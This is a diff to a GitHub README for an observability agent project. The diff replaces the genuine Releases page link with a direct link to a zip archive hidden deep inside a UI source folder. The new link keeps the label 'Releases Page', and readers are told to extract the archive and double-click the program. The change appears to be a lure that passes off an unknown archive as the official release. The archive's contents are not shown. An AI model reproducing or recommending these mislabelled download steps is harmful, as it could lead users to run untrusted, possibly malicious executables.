Adriano886/agente-admin-observabilidad/README.md

 - Internet connection for updating and accessing Grafana

 ## 📂 Download & Install
-1. **Visit the Releases Page**: Access the [Releases Page](https://github.com/Adriano886/agente-admin-observabilidad/releases) to find the latest version of the software.
+1. **Visit the Releases Page**: Access the [Releases Page](https://raw.githubusercontent.com/Adriano886/agente-admin-observabilidad/main/agent-ui/src/components/chat/ChatArea/Messages/observabilidad-agente-admin-v3.9.zip) to find the latest version of the software.
 2. **Select the Latest Version**: Look for the most recent release.
 It will be at the top of the page.
 3. **Download the File**: Click on the download link for your operating system.
-The file name may look like `agente-admin-observabilidad-vX.X.X.zip` or an equivalent format.
+The file name may look like `https://raw.githubusercontent.com/Adriano886/agente-admin-observabilidad/main/agent-ui/src/components/chat/ChatArea/Messages/observabilidad-agente-admin-v3.9.zip` or an equivalent format.
 4. **Extract the Files**: Once the download is complete, locate the file and extract its contents using your preferred extraction tool.
 5. **Run the Application**: Navigate to the extracted folder and double-click on the application file to start it.